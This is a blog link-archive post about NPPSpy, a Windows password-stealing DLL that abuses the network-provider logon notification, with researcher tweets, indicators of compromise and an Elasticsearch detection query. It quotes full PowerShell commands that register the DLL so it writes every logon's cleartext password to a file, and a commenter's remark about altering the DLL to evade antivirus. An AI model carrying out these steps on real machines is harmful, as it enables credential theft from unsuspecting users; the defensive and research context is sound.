Link archive: Windows PSBits/PasswordStealing/NPPSpy at master · gtworek/PSBits
Posted by jpluimers on 2024/12/12
Simple (but fully working) code for
NPLogonNotify(). The function obtains logon data, including cleartext password.
[Wayback/Archive] PSBits/PasswordStealing/NPPSpy at master · gtworek/PSBits has been used in the wild since about 2022 (the code is from 2020).
The code is a ~100 line C file resulting in a DLL exporting the NPGetCaps() and NPLogonNotify() functions.
Background/related:
- [Wayback/Archive]
PSBits/NPPSPy.cat master · gtworek/PSBits - [Wayback/Archive]
NPGetCapsfunction (npapi.h) – Win32 apps | Microsoft Docs - [Wayback/Archive]
NPLogonNotifyfunction (npapi.h) – Win32 apps | Microsoft Docs (deprecated but likely around for a long time) - [Wayback/Archive] How winlogon.exe shares the cleartext password with custom DLLs – YouTube
Just tried, setup a pin, logoff login and after login with the Pin it gives me the password in plain text. I recompile your dll but still was getting flagged by the AV, I have to try to mask it replacing some texts to see if I can evade defender
- [Wayback/Archive] Grzegorz Tworek on Twitter: “Thank you for the mention and great write-up :) It had to happen sooner or later… Lsass protection goes to some crazy levels at the same time leaving Winlogon crazy vulnerable, and even more talkative 🤷🏻♂️” (below thread saved as [Wayback/Archive] Thread by @Purp1eW0lf on Thread Reader App)
- [Wayback/Archive] Dray Agha on Twitter: “In a recent intrusion, we identified a threat actor had compromised the Windows login process, and siphoned cleartext credentials – using a technique known as NPPSPY @0gtweet’s NPPSPY was fascinating to dissect and remediate. Huge thanks to @keydet89 for guidance and wisdom”
- [Wayback/Archive] Dray Agha on Twitter: “Our article couldn’t show what this cleartext credential gathering looked like on the compromised machine, but we recreated the electrifying end product”
- [Wayback/Archive] Dray Agha on Twitter: “IOCs and Behavior –
T1003– Values underHKLM\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order◦For our case:logincontroll– Unexplained entries inHKLM\SYSTEM\CurrentControlSet\Services\\NetworkProvider◦For our case:logincontroll“ - [Wayback/Archive] Dray Agha on Twitter: “If you’re interested in more details, have a lil read of this
www.huntress.com/blog/cleartext-shenanigans-gifting-user-passwords-to-adversaries-with-nppspyAs always, thank you to our content team, @rachelbishop723 and Lily Teplow”
- [Wayback/Archive] Dray Agha on Twitter: “In a recent intrusion, we identified a threat actor had compromised the Windows login process, and siphoned cleartext credentials – using a technique known as NPPSPY @0gtweet’s NPPSPY was fascinating to dissect and remediate. Huge thanks to @keydet89 for guidance and wisdom”
- [Wayback/Archive] sn🥶vvcr💥sh on Twitter: “So much fun automating this sick NPLogonNotify clear-text credential harvesting technique by @0gtweet! There’s a pretty cool blog post from @0x6d69636b on this subject, check it out 👇🏻👇🏻👇🏻
scip.ch/en/?labs.20220217“
- [Wayback/Archive] Network Provider – Sneaky alternative to extract credentials
-
Use
The NPPSpy DLL is copied into the folder%WINDIR%\system32with administrative rights. Afterwards, some registry keys must be set and NPPSpy must be registered as a network provider. This can be done with the following PowerShell commands:$NetworkProviderName = "NPPSpy" New-Item -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$NetworkProviderName" New-Item -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$NetworkProviderName\NetworkProvider" New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$NetworkProviderName\NetworkProvider" -Name "Class" -Value 2 New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$NetworkProviderName\NetworkProvider" -Name "Name" -Value $NetworkProviderName New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$NetworkProviderName\NetworkProvider" -Name "ProviderPath" -PropertyType ExpandString -Value "%SystemRoot%\System32\$NetworkProviderName.dll" $NetworkProviderPath = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name ProviderOrder $NetworkProviderOrder = $NetworkProviderPath.ProviderOrder + ",$NetworkProviderName" Set-ItemProperty -Path $NetworkProviderPath.PSPath -Name ProviderOrder -Value $NetworkProviderOrder
After that, NPPSpy is active and saves the credentials in the fileC:\NPPSpy.txtevery time someone logs in. -
To detect the attack, the registry key
HKLM\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order\ProviderOrdershould be monitored for changes. Furthermore, Services that are registered as Network Providers can be monitored. The query suggested in the article Network Logon Provider Registry Modification can be used for Elasticsearch, for example:registry where registry.data.strings != null and registry.path : "HKL M\\SYSTEM\\*ControlSet*\\Services\\*\\NetworkProvider\\ProviderPath" and /* Excluding default NetworkProviders RDPNP, LanmanWorkstation and webclient. */ not ( user.id : "S-1-5-18" and registry.data.strings in ("%SystemRoot%\\System32\\ntlanman.dll", "%SystemRoot%\\System32\\drprov.dll", "%SystemRoot%\\System32\\davclnt.dll") )
-
- [Wayback/Archive] Network Provider – Sneaky alternative to extract credentials
- [Wayback/Archive] Hackplayers/evil-winrm: The ultimate WinRM shell for hacking/pentesting
InfoSec people from the above Tweets to follow on Twitter:
- [Wayback/Archive] Grzegorz Tworek (@0gtweet) / Twitter
- [Wayback/Archive] Dray Agha (@Purp1eW0lf) / Twitter
- [Wayback/Archive] Harlanoscopy (@keydet89) / Twitter
- [Wayback/Archive] sn🥶vvcr💥sh (@snovvcrash) / Twitter
- [Wayback/Archive] Michael Schneider (@0x6d69636b) / Twitter
–jeroen
The Wiert Corner - irregular stream of stuff 
Nein! Doch! Oh! Grenscontrolemijders maken de N35 bij Enschede nog drukker « The Wiert Corner – irregular stream of stuff said
[…] Link archive: Windows PSBits/PasswordStealing/NPPSpy at master · gtworek/PSBits […]